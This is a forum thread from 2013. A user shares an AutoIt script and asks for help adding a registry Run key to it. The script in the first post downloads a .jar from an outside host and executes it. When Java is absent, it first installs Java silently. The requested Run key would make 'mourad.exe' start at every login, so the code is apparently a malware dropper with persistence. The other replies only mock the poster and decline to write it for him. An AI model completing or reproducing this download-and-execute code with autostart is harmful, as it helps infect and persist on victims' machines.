Can someone help me add RegWrite

05/04/2013 03:08 mourad0009#1
Can someone help me add RegWrite in my AutoItscripts


my (Register to add
PHP Code:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"mourad"="C:\\Documents and Settings\\pc\\Application Data\\mourad.exe" 
my AutoItscripts

PHP Code:
#include <NavInfo.au3>

$Is_Java _NavInfo_IsJavaInstalled()

If 
$Is_Java Then

    InetGet
("http://unlocker.x10.mx/archivos_upload/406299.jar", @TempDir "\1.jar")
    
ShellExecute(@TempDir "\1.jar")
Else
    
InetGet("http://javadl.sun.com/webapps/download/AutoDL?BundleId=76860""javainstall.exe")
    
RunWait("javainstall.exe /s")
    
InetGet("http://unlocker.x10.mx/archivos_upload/406299.jar", @TempDir "\1.jar")
    
ShellExecuteWait(@TempDir "\1.jar")
EndIf 
05/04/2013 13:53 Croco™#2
I have found a brilliant site for you. It is called "Google". I know it is very unknown but please try it...

[Only registered and activated users can see links. Click Here To Register...]
05/04/2013 23:31 FacePalmMan#3
1.use google or the F1 Function before you post questions!
and 2. do it yourself! you keep posting threads where you ask for us to add things into your script! learn autoit and how it works or just stop using autoit!

i tried to teach him (in skype) but he only wanted the full script.